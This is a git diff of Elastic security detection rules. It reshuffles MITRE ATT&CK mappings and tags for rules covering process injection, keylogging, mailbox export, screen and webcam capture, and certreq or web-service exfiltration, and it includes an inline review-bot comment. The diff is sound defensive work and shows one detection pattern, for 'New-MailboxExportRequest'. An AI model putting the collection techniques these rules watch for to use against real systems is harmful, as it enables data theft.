@@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,36 +72,14 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml index 7de13ee97f7..38a36feec06 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,26 +73,14 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml index 9c49b986608..5a5e8b7765d 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,26 +72,14 @@ Elastic Endgame is a security solution that prevents malicious activities like p [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/threat_intel/threat_intel_indicator_match_email.toml b/rules/threat_intel/threat_intel_indicator_match_email.toml index f17ba379307..e4fa4bfc04d 100644 --- a/rules/threat_intel/threat_intel_indicator_match_email.toml +++ b/rules/threat_intel/threat_intel_indicator_match_email.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2025/04/11" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/22" [rule] author = ["Elastic"] 
@@ -80,7 +80,7 @@ or a [custom integration](https://www.elastic.co/guide/en/security/current/es-th More information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html). """ severity = "high" -tags = ["Rule Type: Threat Match", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = ["Rule Type: Threat Match", "Resources: Investigation Guide"] threat_index = ["filebeat-*", "logs-ti_*"] threat_indicator_path = "threat.indicator" threat_language = "kuery" @@ -165,16 +165,3 @@ value = "threat.indicator.email.address" type = "mapping" field = "email.reply_to.address" value = "threat.indicator.email.address" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml index 7f7f82b9bac..bdff598faa5 100644 --- a/rules/windows/collection_email_outlook_mailbox_via_com.toml +++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -21,7 +21,14 @@ references = [ risk_score = 47 rule_id = "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -80,36 +87,36 @@ Outlook's integration with the Component Object Model (COM) allows processes to [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" - [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" reference = "https://attack.mitre.org/techniques/T1114/001/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index fee81690d6d..97ba3fb44a3 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -75,7 +75,21 @@ references = [ risk_score = 47 rule_id = "6aace640-e631-4870-ba8e-5fdda09325db" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" 
@@ -88,18 +102,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" - [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 693f71e02fc..90ae0bf3cf8 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
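Review bot: The collection_email_powershell_exchange_mailbox.toml hunk adds `id = "T1005"` / `name = "Data from Local System"` next to `T1114.002` / `Remote Email Collection`; the rule targets mailbox access on a remote Exchange server, so T1005 (local-host data) is a questionable fit unless the query also matches reads of local mail stores, which is not visible here. The same T1005 addition appears in collection_mailbox_export_winlog.toml. The added Execution entry also uses an inconsistent layout (no blank line after `[[rule.threat]]`, three blank lines before `[rule.threat.tactic]`) compared with the existing Collection entry in the same file.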
@@ -120,21 +120,32 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.001" +name = "Local Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/001/" [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index e40e8488f51..3f922888c59 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -96,7 +96,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" 
@@ -122,34 +129,39 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1123" name = "Audio Capture" reference = "https://attack.mitre.org/techniques/T1123/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml index f84dfe236b9..149d213dfb5 100644 --- a/rules/windows/collection_posh_clipboard_capture.toml +++ b/rules/windows/collection_posh_clipboard_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -153,16 +153,34 @@ case_insensitive = true value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1115" name = "Clipboard Data" reference = "https://attack.mitre.org/techniques/T1115/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml index 58297f5baa7..d99809a9e75 100644 --- a/rules/windows/collection_posh_keylogger.toml +++ b/rules/windows/collection_posh_keylogger.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -104,7 +104,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" 
@@ -128,57 +135,44 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1056"
 name = "Input Capture"
 reference = "https://attack.mitre.org/techniques/T1056/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1056.001"
 name = "Keylogging"
 reference = "https://attack.mitre.org/techniques/T1056/001/"
+
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1056"
-name = "Input Capture"
-reference = "https://attack.mitre.org/techniques/T1056/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1056.001"
-name = "Keylogging"
-reference = "https://attack.mitre.org/techniques/T1056/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml
index 936b683766c..a13e4dc57b8 100644
--- a/rules/windows/collection_posh_mailbox.toml
+++ b/rules/windows/collection_posh_mailbox.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/11"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/26"
 [rule]
 author = ["Elastic"]
@@ -135,12 +135,10 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1114.001"
 name = "Local Email Collection"
@@ -151,10 +149,30 @@ id = "T1114.002"
 name = "Remote Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/002/"
+
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml
index 8c0cdb1752a..f97f5db210d 100644
--- a/rules/windows/collection_posh_screen_grabber.toml
+++ b/rules/windows/collection_posh_screen_grabber.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/19"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/26"
 [rule]
 author = ["Elastic"]
@@ -136,16 +136,34 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1113"
 name = "Screen Capture"
 reference = "https://attack.mitre.org/techniques/T1113/"
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_webcam_video_capture.toml b/rules/windows/collection_posh_webcam_video_capture.toml
index 02a9ad1f14e..f50dd0f2e8e 100644
--- a/rules/windows/collection_posh_webcam_video_capture.toml
+++ b/rules/windows/collection_posh_webcam_video_capture.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/18"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/26"
 [rule]
 author = ["Elastic"]
@@ -93,7 +93,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Collection",
+ "Data Source: PowerShell Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -117,34 +124,34 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1125"
 name = "Video Capture"
 reference = "https://attack.mitre.org/techniques/T1125/"
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml
index ef15efa4aae..076a07172bb 100644
--- a/rules/windows/collection_winrar_encryption.toml
+++ b/rules/windows/collection_winrar_encryption.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/04"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/12"
 [rule]
 author = ["Elastic"]
@@ -110,6 +110,11 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
@@ -120,6 +125,7 @@ id = "T1560.001"
 name = "Archive via Utility"
 reference = "https://attack.mitre.org/techniques/T1560/001/"
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml
index b1817697a24..d2af75605fd 100644
--- a/rules/windows/command_and_control_certreq_postdata.toml
+++ b/rules/windows/command_and_control_certreq_postdata.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/13"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [transform]
 [[transform.osquery]]
@@ -108,7 +108,22 @@ references = ["https://lolbas-project.github.io/lolbas/Binaries/Certreq/"]
 risk_score = 47
 rule_id = "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Command and Control",
+ "Tactic: Exfiltration",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -120,26 +135,38 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1567"
 name = "Exfiltration Over Web Service"
 reference = "https://attack.mitre.org/techniques/T1567/"
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml
index 32761193600..0c00e93c80e 100644
--- a/rules/windows/command_and_control_common_webservices.toml
+++ b/rules/windows/command_and_control_common_webservices.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/04"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/12"
 [transform]
 [[transform.investigate]]
@@ -339,13 +339,54 @@ network where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1102"
 name = "Web Service"
 reference = "https://attack.mitre.org/techniques/T1102/"
+[[rule.threat.technique]]
+id = "T1568"
+name = "Dynamic Resolution"
+reference = "https://attack.mitre.org/techniques/T1568/"
+[[rule.threat.technique.subtechnique]]
+id = "T1568.002"
+name = "Domain Generation Algorithms"
+reference = "https://attack.mitre.org/techniques/T1568/002/"
+
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+[[rule.threat.technique.subtechnique]]
+id = "T1090.002"
+name = "External Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/002/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+[[rule.threat.technique.subtechnique]]
+id = "T1567.001"
+name = "Exfiltration to Code Repository"
+reference = "https://attack.mitre.org/techniques/T1567/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1567.002"
+name = "Exfiltration to Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1567/002/"
+
+
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
index 0b1bd471e05..7a9bf50f8f0 100644
--- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
+++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/04"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -92,18 +92,14 @@ network where host.os.type == "windows" and network.protocol == "dns" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1573"
 name = "Encrypted Channel"
 reference = "https://attack.mitre.org/techniques/T1573/"
-[[rule.threat.technique.subtechnique]]
-id = "T1573.002"
-name = "Asymmetric Cryptography"
-reference = "https://attack.mitre.org/techniques/T1573/002/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+
diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml
index be7fdce0a18..a9db0f9e470 100644
--- a/rules/windows/command_and_control_iexplore_via_com.toml
+++ b/rules/windows/command_and_control_iexplore_via_com.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/28"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
@@ -20,7 +20,14 @@ name = "Potential Command and Control via Internet Explorer"
 risk_score = 47
 rule_id = "acd611f3-2b93-47b3-a0a3-7723bcc46f6d"
 severity = "medium"
